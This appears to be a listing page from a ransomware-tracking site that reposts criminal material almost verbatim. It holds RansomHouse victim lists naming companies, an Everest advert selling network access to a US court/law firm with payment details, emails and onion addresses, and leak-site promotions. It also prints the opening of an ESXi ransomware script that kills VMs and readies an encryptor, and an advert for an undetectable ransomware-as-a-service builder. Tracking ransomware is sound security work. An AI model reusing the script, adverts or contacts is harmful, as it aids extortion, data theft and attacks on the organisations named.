ransomware

Ransomhouse Scorecard

Below is a list of companies that either have considered their financial gain to be above the interests of their partners / individuals who have entrusted their data to them or have chosen to conceal the fact that they have been compromised. HOT NEWS AvidXchange Status: EVIDENCE, 100X and ALL Clients Status: EVIDENCE, ADATA Technology Status: DISCLOSED, OMT Officine Meccaniche Torino S.p.A. Status: EVIDENCE, Tranztec Solutions Status: EVIDENCE. AvidXchangehttps://www.avidxchange.com/ 2537 Status: EVIDENCE Action: Leak Action…

Read More

US District Court / Law company – Everest Ransomware Group

US District Court / Law company On sale access to the network US District Court, Employee access,full controlAV: NoNetwork access of a lawyer with tons various confidential documents is included in this sale. Internalcorrespondence, tax,banks,ssn,dl,court cases. State IL. This sale includes: DA access of a building company. Full access to the entire network. Architecture,electrical engineering,civil engineering and much more Price 15,000$Payment: btc,xmr Contact email: everestransomteam@onionmail.org or jabber: everestgroup@exploit.im,everestgroup@thesecure.biz http://ransomocmou6mnbquqz44ewosbkjk3o5qjsl3orawojexfook2j7esad.onion/us-district-court-law-company/

Read More

Dunghill Leak

About us We are an international team of technical specialists conducting research in the field of information security.We are not interested in politics and that is why we do not cooperate with governments and law enforcement agencies.Our main goal is to make the world more secure.Yes, security costs money and so does our time. That's why we offer our services on a fee basis. Types of services:- security breach investigation- protection against information leaks- recommendations…

Read More

Ransomware RansomHouse Group

Below is a list of companies that either have considered their financial gain to be above the interests of their partners / individuals who have entrusted their data to them or have chosen to conceal the fact that they have been compromised.Indonesia Powerhttps://www.indonesiapower.co.id/17Status:EVIDENCEAction:EncryptedAction date:12/02/2023Faraday Technologyhttps://www.faraday-tech.com/3891Status:EVIDENCEAction:EncryptedAction date:06/10/2022St. Kitts & Nevishttps://www.gov.kn4384Status:EVIDENCEAction:EncryptedAction date:27/01/2023Delaware Life Insurance Companyhttps://www.delawarelife.com/5101Status:EVIDENCEAction:EncryptedAction date:04/02/2023E&S Heating & Ventilation Ltdhttps:/www.esgroup.co.uk11635Status:DISCLOSEDAction:EncryptedAction date:30/01/2023Audio Videohttps://www.audiovideocorp.com/11549Status:DISCLOSEDAction:EncryptedAction date:30/01/2023AESCULAPIUS Farmaceuticihttps://www.aesculapius.it/18194Status:DISCLOSEDAction:EncryptedAction date:04/02/2023Hospital Service SpAhttps://www.hshospitalservice.com/25628Status:DISCLOSEDAction:EncryptedAction date:31/12/2022Jeffries Morrishttps://www.thejeffriescompanies.com/jeffries-morris28721Status:DISCLOSEDAction:EncryptedAction date:20/01/2023The DGCXhttps://www.dgcx.ae/29462Status:DISCLOSEDAction:EncryptedAction date:13/01/2023Holovishttps://www.holovis.com/35206Status:DISCLOSEDAction:EncryptedAction date:24/12/2022Trans Maldivian Airwayshttps://www.transmaldivian.com/34978Status:EVIDENCEAction:EncryptedAction date:31/12/2022IMI Hydronic…

Read More

Ransomhouse Drops

We are happy to say that published the half of data that was leaked from Keralty Rest data was SOLD Check out our website: http://zohlm7ahjwegcedoz7lrdrti7bvpofymcayotp744qhx6gjmxbuo2yid.onion/ We have a new addition to our list ! MeetSaint Kitts and NevisCheck out our website: http://zohlm7ahjwegcedoz7lrdrti7bvpofymcayotp744qhx6gjmxbuo2yid.onion/ Check out our website: http://zohlm7ahjwegcedoz7lrdrti7bvpofymcayotp744qhx6gjmxbuo2yid.onion/ We are happy to say that published the full dump of data that was leaked fromAesculapius FarmaceuticiCheck out our website: http://zohlm7ahjwegcedoz7lrdrti7bvpofymcayotp744qhx6gjmxbuo2yid.onion/ We have a new addition to our…

Read More

ESXi Ransomware Script

ESXi Ransomware A script was found on one of the servers that the attackers used to run the ransomware https://youtu.be/jfv-AiHooYw #!/bin/shCLEAN_DIR="/tmp/"# SET LIMITSulimit -p $(ulimit -Hp)ulimit -n $(ulimit -Hn)## CHANGE CONFIGfor config_file in $(esxcli vm process list | grep "Config File" | awk '{print $3}'); do echo "FIND CONFIG: $config_file" sed -i -e 's/.vmdk/1.vmdk/g' -e 's/.vswp/1.vswp/g' "$config_file"done## STOP VMXecho "KILL VMX"kill -9 $(ps | grep vmx | awk '{print $2}')## ENCRYPTchmod +x $CLEAN_DIR/encryptfor volume in…

Read More

Hackers have reduced the price of “repurchase” of data in Russia

According to RU companies, this year, the “prices” of attackers for decrypting information and refusing to release it to free access have significantly fallen in price.Hackers have reduced the cost of their servicesAccording to Positive Technologies analyst Fedor Chunizhekov, in the second quarter of 2022, the median ransom of encrypted or stolen data was about $36,000, which is 51% less than at the end of 2021. And according to statistics from the startup Coalition, in…

Read More

Open-Source Ransomware As A Service for Linux, MacOS and Windows

Features: Generate a ransomware payload With or without GUI payload FUD (Fully Undetectable by Anti-Virus) Works on Windows, MacOS and Linux Super fast encryption with PyCrypto Compile to EXE, APP or Unix/Linux executable Custom icon for your EXE payload Receive keys of victims Decrypt files Demo mode (payload won't encrypt anything) Fullscreen mode (Warning takes over the screen) Custom warning message for your victim Custom image in your payload Ghost mode (Rename by adding .DEMON…

Read More